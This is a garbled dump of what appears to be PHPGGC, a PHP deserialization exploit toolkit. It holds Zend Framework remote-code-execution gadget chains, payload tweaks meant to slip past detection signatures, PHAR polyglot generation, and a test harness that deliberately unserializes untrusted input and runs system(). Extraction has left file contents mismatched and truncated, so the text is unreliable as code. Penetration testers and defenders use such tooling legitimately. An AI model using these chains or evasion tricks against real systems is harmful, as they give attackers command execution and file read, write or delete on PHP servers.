\Zend_Layout( 24 | new \Zend_Filter_Inflector(), 25 | true, 26 | $parameters['code'] 27 | ) 28 | )] 29 | ); 30 | } 31 | } -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/4/gadgets.php: -------------------------------------------------------------------------------- 1 | _writers = $x; 10 | } 11 | } 12 | 13 | class Zend_Log_Writer_Mail 14 | { 15 | protected $_eventsToMail; 16 | protected $_layoutEventsToMail; 17 | protected $_mail; 18 | protected $_layout; 19 | protected $_subjectPrependText; 20 | 21 | public function __construct( 22 | $eventsToMail, 23 | $layoutEventsToMail, 24 | $mail, 25 | $layout 26 | ) { 27 | $this->_eventsToMail = 
$eventsToMail; 28 | $this->_layoutEventsToMail = $layoutEventsToMail; 29 | $this->_mail = $mail; 30 | $this->_layout = $layout; 31 | $this->_subjectPrependText = null; 32 | } 33 | } 34 | 35 | class Zend_Mail 36 | { 37 | } 38 | 39 | class Zend_Layout 40 | { 41 | protected $_inflector; 42 | protected $_inflectorEnabled; 43 | protected $_layout; 44 | 45 | public function __construct( 46 | $inflector, 47 | $inflectorEnabled, 48 | $layout 49 | ) { 50 | $this->_inflector = $inflector; 51 | $this->_inflectorEnabled = $inflectorEnabled; 52 | $this->_layout = '){}' . $layout . '/*'; 53 | } 54 | } 55 | 56 | class Zend_Filter_Callback 57 | { 58 | protected $_callback = "create_function"; 59 | protected $_options = [""]; 60 | } 61 | 62 | class Zend_Filter_Inflector 63 | { 64 | protected $_rules = []; 65 | 66 | public function __construct() 67 | { 68 | $this->_rules['script'] = [new Zend_Filter_Callback()]; 69 | } 70 | } -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | writers = [new \Zend\Log\Writer\Mail($func, $param)]; 10 | } 11 | } 12 | } 13 | 14 | namespace Zend\Log\Writer { 15 | class Mail { 16 | protected $mail; 17 | protected $eventsToMail; 18 | protected $subjectPrependText; 19 | 20 | function __construct($func, $param) 21 | { 22 | $this->mail = new \Zend\View\Renderer\PhpRenderer($func); 23 | $this->eventsToMail = [$param]; 24 | $this->subjectPrependText = null; 25 | } 26 | 27 | } 28 | } 29 | 30 | namespace Zend\View\Renderer { 31 | class PhpRenderer { 32 | private $__helpers; 33 | 34 | function __construct($func) 35 | { 36 | $this->__helpers = new \Zend\View\Resolver\TemplateMapResolver($func); 37 | } 38 | } 39 | } 40 | 41 | namespace Zend\View\Resolver { 42 | class TemplateMapResolver { 43 | protected $map; 44 | 45 | function __construct($func) 46 | { 47 | $this->map = [ 48 | "setBody" => $func, 49 | ]; 50 
| } 51 | } 52 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Enhancement/ASCIIStrings.php: -------------------------------------------------------------------------------- 1 | B"; -> S:5:"A\00B\09\0D"; 10 | * This is experimental and it might not work in some cases. 11 | */ 12 | class ASCIIStrings extends Enhancement 13 | { 14 | public function process_serialized($serialized) 15 | { 16 | $new = ''; 17 | $last = 0; 18 | $current = 0; 19 | $pattern = '#\bs:([0-9]+):"#'; 20 | 21 | while( 22 | $current < strlen($serialized) && 23 | preg_match( 24 | $pattern, $serialized, $matches, PREG_OFFSET_CAPTURE, $current 25 | ) 26 | ) 27 | { 28 | 29 | $p_start = $matches[0][1]; 30 | $p_start_string = $p_start + strlen($matches[0][0]); 31 | $length = $matches[1][0]; 32 | $p_end_string = $p_start_string + $length; 33 | 34 | # Check if this really is a serialized string 35 | if(!( 36 | strlen($serialized) > $p_end_string + 2 && 37 | substr($serialized, $p_end_string, 2) == '";' 38 | )) 39 | { 40 | $current = $p_start_string; 41 | continue; 42 | } 43 | $string = substr($serialized, $p_start_string, $length); 44 | 45 | # Convert every special character to its S representation 46 | $clean_string = ''; 47 | for($i=0; $i < strlen($string); $i++) 48 | { 49 | $letter = $string[$i]; 50 | $clean_string .= ctype_print($letter) && $letter != '\\' ? 51 | $letter : 52 | sprintf("\\%02x", ord($letter)); 53 | ; 54 | } 55 | 56 | # Make the replacement 57 | $new .= 58 | substr($serialized, $last, $p_start - $last) . 59 | 'S:' . $matches[1][0] . ':"' . $clean_string . 
'";' 60 | ; 61 | $last = $p_end_string + 2; 62 | $current = $last; 63 | } 64 | 65 | $new .= substr($serialized, $last); 66 | return $new; 67 | } 68 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Enhancement/Enhancement.php: -------------------------------------------------------------------------------- 1 | enhancements = $enhancements; 10 | } 11 | 12 | /** 13 | * Calls method $method on every enhancement. 14 | */ 15 | public function __call($method, $arguments) 16 | { 17 | $argument = $arguments[0]; 18 | foreach($this->enhancements as $enhancement) 19 | { 20 | $argument = $enhancement->$method( 21 | $argument 22 | ); 23 | } 24 | return $argument; 25 | } 26 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Enhancement/FastDestruct.php: -------------------------------------------------------------------------------- 1 | $object, $key + 1 => $key]; 34 | } 35 | 36 | /** 37 | * Post process step of the fast-destruct technique: replaces the original 38 | * array with an array with the two same keys. 39 | */ 40 | public function process_serialized($serialized) 41 | { 42 | /* 43 | This replaces the whole array structure, but it could not work in some 44 | edge cases. The second technique is more permissive but should not cause 45 | problems. 46 | 47 | $find = ( 48 | '#a:2:{' . 49 | 'i:' . self::FAST_DESTRUCT_TEMP_KEY . ';' . 50 | '(.*?)' . 51 | 'i:' . (self::FAST_DESTRUCT_TEMP_KEY + 1) . ';' . 52 | 'i:' . self::FAST_DESTRUCT_TEMP_KEY . ';' . 53 | '}#s' 54 | ); 55 | $replace = ( 56 | 'a:2:{' . 57 | 'i:' . self::FAST_DESTRUCT_FINAL_KEY . ';' . 58 | '\1' . 59 | 'i:' . self::FAST_DESTRUCT_FINAL_KEY . ';' . 60 | 'i:' . self::FAST_DESTRUCT_FINAL_KEY . ';' . 61 | '}' 62 | ); 63 | */ 64 | $find = ( 65 | '#i:(' . 66 | self::FAST_DESTRUCT_TEMP_KEY . '|' . 67 | (self::FAST_DESTRUCT_TEMP_KEY + 1) . 68 | ');#' 69 | ); 70 | $replace = 'i:' . self::FAST_DESTRUCT_FINAL_KEY . 
';';
        # Every match in the text is replaced, not only the first one
        return preg_replace($find, $replace, $serialized);
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/Enhancement/PlusNumbers.php:
--------------------------------------------------------------------------------
/**
 * NOTE(review): the beginning of this file (the PHP open tag and the first
 * lines of this comment) was lost when the page was extracted; the next line
 * is the surviving right-hand side of the first example.
 *   ... O:+3:"Abc":+1:{s:+1:"x";i:+3;}
 * With 's':
 * O:3:"Abc":1:{s:1:"x";i:3;} -> O:3:"Abc":1:{s:+1:"x";i:3;}
 *
 * Note: Since PHP 7.2, only i and d (float) types can be prefixed by
 * a plus sign.
 *
 * Detection note: a signature written for the canonical form, such as one
 * expecting a digit right after `O:`, does not match the `+`-prefixed form,
 * although the PHP versions covered by the note above accept both.
 */
class PlusNumbers extends Enhancement
{
    # Type letters whose numbers get a plus sign; the string is used as a
    # regex character class ('s' in the example above)
    private $types;

    /**
     * @param string $types Type letters to process, concatenated
     */
    public function __construct($types)
    {
        $this->types = $types;
    }

    /**
     * Inserts `+` in front of the number that follows any of the configured
     * type letters.
     *
     * The replacement runs over the whole text, string contents included.
     *
     * @param string $serialized Serialized payload
     * @return string Payload with the selected numbers prefixed by `+`
     */
    public function process_serialized($serialized)
    {
        # Escape the letters before they are placed inside the character class
        $types = preg_quote($this->types, '#');
        # <letter>:<digits> followed by ':' or ';' becomes <letter>:+<digits>
        $serialized = preg_replace(
            '#\b([' . $types . ']):(\d+)([:;])#',
            '$1:+$2$3',
            $serialized
        );
        return $serialized;
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/Enhancement/Wrapper.php:
--------------------------------------------------------------------------------
# NOTE(review): the beginning of this file was lost when the page was
# extracted, including the class header and the definition of
# `_call_if_exists`. The next line is the surviving tail of a statement,
# presumably `return $this->_call_if_exists(...)` as in the two methods below.
_call_if_exists('process_parameters', $parameters);
    }

    /**
     * Forwards the payload object to the `process_object` hook through
     * `_call_if_exists`, which is not visible here; by its name it presumably
     * calls the hook only when one is defined (to be confirmed).
     */
    public function process_object($payload)
    {
        return $this->_call_if_exists('process_object', $payload);
    }

    /**
     * Forwards the serialized payload to the `process_serialized` hook
     * through `_call_if_exists` (definition not visible here).
     */
    public function process_serialized($serialized)
    {
        return $this->_call_if_exists('process_serialized', $serialized);
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/Exception.php:
--------------------------------------------------------------------------------
# NOTE(review): the content of this file and the beginning of what followed it
# were lost when the page was extracted. The surviving lines look like the
# self-test hooks of a file-deletion chain type (see the 'test file delete'
# label), not like an exception class. The next line is the tail of an array
# entry whose key is not visible (presumably 'remote_path', which the methods
# below read).
\PHPGGC\Util::rand_file('test file delete')
        ];
    }

    /**
     * Self-test check: succeeds when the file at `remote_path` no longer
     * exists. $output is not used.
     */
    public function test_confirm($arguments, $output)
    {
        return !file_exists($arguments['remote_path']);
    }

    /**
     * Removes the test file if the self-test left it in place.
     */
    public function test_cleanup($arguments)
    {
        if(file_exists($arguments['remote_path']))
            unlink($arguments['remote_path']);
}
}
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/FileRead.php:
--------------------------------------------------------------------------------
# NOTE(review): the beginning of this file was lost when the page was
# extracted, including the class header. The next line is the surviving tail
# of an array entry whose key is not visible (presumably 'remote_path', which
# the methods below read).
\PHPGGC\Util::rand_file('test file read')
        ];
    }

    /**
     * Self-test check: succeeds when the contents of the file at
     * `remote_path` appear somewhere in $output.
     */
    public function test_confirm($arguments, $output)
    {
        $expected = file_get_contents($arguments['remote_path']);
        return strpos($output, $expected) !== false;
    }

    /**
     * Removes the test file if it is still present.
     */
    public function test_cleanup($arguments)
    {
        if(file_exists($arguments['remote_path']))
            unlink($arguments['remote_path']);
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/FileWrite.php:
--------------------------------------------------------------------------------
# NOTE(review): the beginning of this file was lost when the page was
# extracted, including the class header. The next line is the surviving tail
# of an array entry whose key is not visible (presumably 'local_path', which
# the methods below read).
\PHPGGC\Util::rand_file('test file write'),
            'remote_path' => \PHPGGC\Util::rand_path('', '.test')
        ];
    }

    /**
     * Self-test check: succeeds when the file at `remote_path` exists and
     * contains the contents of the file at `local_path`. $output is not used.
     */
    public function test_confirm($arguments, $output)
    {
        if(!file_exists($arguments['remote_path']))
            return false;

        $expected = file_get_contents($arguments['local_path']);
        $obtained = file_get_contents($arguments['remote_path']);

        return strpos($obtained, $expected) !== false;
    }

    /**
     * Removes both test files if they are still present.
     */
    public function test_cleanup($arguments)
    {
        if(file_exists($arguments['remote_path']))
            unlink($arguments['remote_path']);
        if(file_exists($arguments['local_path']))
            unlink($arguments['local_path']);
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/PHPInfo.php:
--------------------------------------------------------------------------------
# NOTE(review): the content of this file and the beginning of what followed it
# were lost when the page was extracted. The surviving lines build a shell
# command for a self-test, so they probably belong to a command-execution
# chain type rather than to the file named above. The next line is the tail of
# a statement, presumably `$this->__test_rand_token = sha1(rand());`.
__test_rand_token = sha1(rand());
        # The token is only a marker for the self-test; rand() is not a
        # cryptographic source and this value is not a secret.
        $this->__test_rand_path = \PHPGGC\Util::rand_path();
        # The command writes the marker into the marker file. Both parts are
        # concatenated without shell quoting; the token is hex, the format of
        # rand_path()'s result is not visible here.
        return
            'echo ' . $this->__test_rand_token .
            ' > ' .
$this->__test_rand_path
        ;
    }

    /**
     * Self-test check: succeeds when the marker file exists and contains the
     * marker token, that is, when the test command actually ran. Neither
     * argument is used.
     */
    public function test_confirm($arguments, $output)
    {
        if(!file_exists($this->__test_rand_path))
            return false;
        $result = file_get_contents($this->__test_rand_path);
        return strpos($result, $this->__test_rand_token) !== false;
    }

    /**
     * Removes the marker file if it is still present.
     */
    public function test_cleanup($arguments)
    {
        if(file_exists($this->__test_rand_path))
            unlink($this->__test_rand_path);
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/RCE/Command.php:
--------------------------------------------------------------------------------
# NOTE(review): the beginning of this file was lost when the page was
# extracted, including the class header. The next line is the tail of a
# statement, presumably `$command = $this->_test_build_command();`.
_test_build_command();
        # Self-test arguments: the shell command is passed as is
        return [
            'command' => $command
        ];
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/RCE/FunctionCall.php:
--------------------------------------------------------------------------------
# NOTE(review): the beginning of this file was lost when the page was
# extracted, including the class header. The next line is the tail of a
# statement, presumably `$command = $this->_test_build_command();`.
_test_build_command();
        # Self-test arguments: a function name plus the single parameter it
        # is called with
        return [
            'function' => 'system',
            'parameter' =>
                $command
        ];
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/RCE/PHPCode.php:
--------------------------------------------------------------------------------
# NOTE(review): the beginning of this file was lost when the page was
# extracted, including the class header. The next line is the tail of a
# statement, presumably `$command = $this->_test_build_command();`.
_test_build_command();
        # Self-test arguments: PHP source text; var_export() renders the
        # command as a quoted PHP string literal
        return [
            'code' => 'system(' . var_export($command, true) . ');'
        ];
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/SSRF.php:
--------------------------------------------------------------------------------
# NOTE(review): nothing of this file survived extraction of the page.
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/SqlInjection.php:
--------------------------------------------------------------------------------
# NOTE(review): the content of this file and the beginning of what followed it
# were lost when the page was extracted. The surviving lines are the default
# parameters and the methods of a base class for PHAR file formats, not
# SQL-injection code. The next line is the tail of an array entry whose key is
# not visible (presumably 'filename', which generate_base_phar() reads).
'test.txt',
        'prefix' => ''
    ];

    /**
     * Creates an instance of a PHAR file format.
     *
     * @param string $metadata PHAR's metadata (serialized payload)
     * @param array $parameters Overrides for the default parameters above
     */
    public function __construct($metadata, $parameters=[])
    {
        $this->metadata = $metadata;
        # Array union: caller-supplied keys win, missing keys keep defaults
        $this->parameters = $parameters + $this->parameters;
    }

    /**
     * Generates the contents of the PHAR file.
     *
     * Builds an archive around placeholder metadata, swaps the placeholder
     * for the real metadata and has the format recompute the signature.
     *
     * @return string Content of generated PHAR file
     */
    public function generate()
    {
        $this->generate_dummy_metadata();
        $this->generate_base_phar();
        $this->replace_metadata();
        $this->update_signature();
        return $this->data;
    }

    /**
     * Builds an archive with placeholder metadata in a temporary file, loads
     * its bytes into $this->data and deletes the file.
     */
    protected function generate_base_phar()
    {
        # NOTE(review): the name is fixed and lives in the shared temporary
        # directory, and errors from the unlink are suppressed; on a
        # multi-user host another local account could pre-create this path.
        $path = (
            sys_get_temp_dir() . DIRECTORY_SEPARATOR .
            'phpggc' . $this->format . '.phar'
        );
        @unlink($path);

        $phar = new \Phar($path);
        $phar->startBuffering();
        $phar->addFromString("dummy", 'test');
        $phar->addFromString($this->parameters['filename'], 'test');
        # NOTE(review): the second operand shows as an empty string here; the
        # stub literal was probably stripped as markup when the page was
        # extracted. Bytes from the 'prefix' parameter come before the stub,
        # so the archive need not begin with any particular magic bytes:
        # a content check that looks only at the start of a file says little
        # about whether the file is a PHAR.
        $phar->setStub(
            $this->parameters['prefix'] .
            ''
        );
        $phar->setMetadata($this->dummy_metadata);

        # Since we might generate a new signature, we need to make sure the
        # algorithm is valid
        $phar->setSignatureAlgorithm(\Phar::SHA1);
        $phar->stopBuffering();

        $this->data = file_get_contents($path);
        unlink($path);
    }

    /**
     * Prepares placeholder metadata: a run of 'A' characters sized from the
     * length of the real metadata.
     */
    protected function generate_dummy_metadata()
    {
        # We want our fake metadata to have the same size as our serialized
        # payload, so that we can make an in-place replacement in archives
        # First the fixed characters of a serialized string are subtracted,
        # then the number of digits of the remaining length.
        $dummy_size = strlen($this->metadata) - strlen('s::"";');
        $dummy_size = $dummy_size - strlen($dummy_size);
        $this->dummy_metadata = str_repeat('A', $dummy_size);
    }

    /**
     * Updates the PHAR signature of the file.
     * It is format-dependent and therefore abstract.
     */
    abstract protected function update_signature();

    /**
     * Makes an in-place replacement at $offset in $data
     *
     * The bytes from $offset up to $offset + strlen($change) are overwritten
     * by $change; the total length stays the same. $offset is handed to
     * substr() as is, so a negative value counts from the end.
     * NOTE(review): with a negative $offset, if $offset + strlen($change)
     * is exactly 0 the last substr() returns the whole of $data.
     */
    protected function in_place_replace($data, $offset, $change)
    {
        return
            substr($data, 0, $offset) .
            $change .
            substr($data, $offset + strlen($change))
        ;
    }

    /**
     * Returns the signature for given data.
     *
     * This is the raw 20-byte SHA-1 digest of $data. It is unkeyed: anyone
     * holding the file can recompute it, so a valid signature of this kind
     * shows that the archive is internally consistent, not where it came from.
     */
    protected function compute_signature($data)
    {
        return hex2bin(sha1($data));
    }

    /**
     * Replaces every occurrence of the fake metadata by the real one.
     *
     * The search string is the serialized form of the placeholder, which is
     * what the replacement (already serialized) is sized to match.
     */
    protected function replace_metadata()
    {
        $this->data = str_replace(
            serialize($this->dummy_metadata), $this->metadata, $this->data
        );
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/Phar/Phar.php:
--------------------------------------------------------------------------------
# NOTE(review): the beginning of this file was lost when the page was
# extracted, including the class header and the method signature. The next
# line is the tail of a statement, presumably `$data = substr($this->data, 0, -28);`.
data, 0, -28);
        # The digest covers everything except the last 28 bytes and is
        # written at 28 bytes from the end. With the 20-byte value returned by
        # compute_signature() the final 8 bytes stay as they are (presumably
        # the signature type and trailing magic; to be confirmed).
        $signature = $this->compute_signature($data);
        $this->data = $this->in_place_replace($this->data, -28, $signature);
    }
}
--------------------------------------------------------------------------------
/lib/PHPGGC/Phar/Zip.php:
--------------------------------------------------------------------------------
# NOTE(review): the content of this file and the beginning of what followed it
# were lost when the page was extracted. The surviving lines are a stand-alone
# test script that takes a vector name and a base64-encoded payload on the
# command line. The next line is the tail of a usage message.
' . "\n");
    exit(0);
}

$vector = $argv[1];
# Non-strict decoding: characters outside the base64 alphabet are discarded
$payload = base64_decode($argv[2]);

# A test.php in the working directory replaces the rest of this script
if(file_exists('test.php'))
{
    require('test.php');
    exit(0);
}
if(!file_exists('vendor/autoload.php'))
{
    print('Unable to load either test.php or vendor/autoload.php' . "\n");
    exit(-1);
}

# Loads the classes of the project under test so that the payload's classes
# can be resolved. From here on the script deserializes its argument on
# purpose: whatever the payload triggers runs with the privileges of the
# account that started the script.
require('vendor/autoload.php');

# The payload must be processed in function of its form:
# Phar: Try to get the content of the only file in the PHAR file
switch($vector)
{
    case 'phar':
        $phar = sys_get_temp_dir() .
'/phpggc.phar';
        # The payload is the whole archive. Reading any path through the
        # phar:// wrapper makes PHP parse the archive, and on PHP versions
        # before 8.0 that includes unserializing its metadata. The same holds
        # for application code that hands a user-controlled path to a
        # filesystem function.
        # NOTE(review): fixed file name in the shared temporary directory.
        file_put_contents($phar, $payload);
        var_dump(file_get_contents('phar://' . $phar . '/test.txt'));
        unlink($phar);
        break;
    case '__toString':
        # Printing the deserialized value is what converts it to a string
        $payload = unserialize($payload);
        print($payload);
        break;
    case '__destruct':
    case '__wakeup':
        # Deserializing is enough; nothing is done with the result
        $payload = unserialize($payload);
        break;
    default:
        print('Unable to test payload via vector "' . $vector . '"' . "\n");
}
--------------------------------------------------------------------------------
/other/debug_rce/debug_rce.php:
--------------------------------------------------------------------------------
# NOTE(review): the content of this file and the beginning of what followed it
# were lost when the page was extracted. The next line is the tail of a call
# to a generate() method inside a try block; the object it is called on is not
# visible.
generate();
}
catch(\PHPGGC\Exception $e)
{
    # Tool-level errors are reported as one line and a non-zero exit status
    print("ERROR: " . $e->getMessage() . "\n");
    exit(1);
}

--------------------------------------------------------------------------------
/templates/chain.php:
--------------------------------------------------------------------------------
 1 |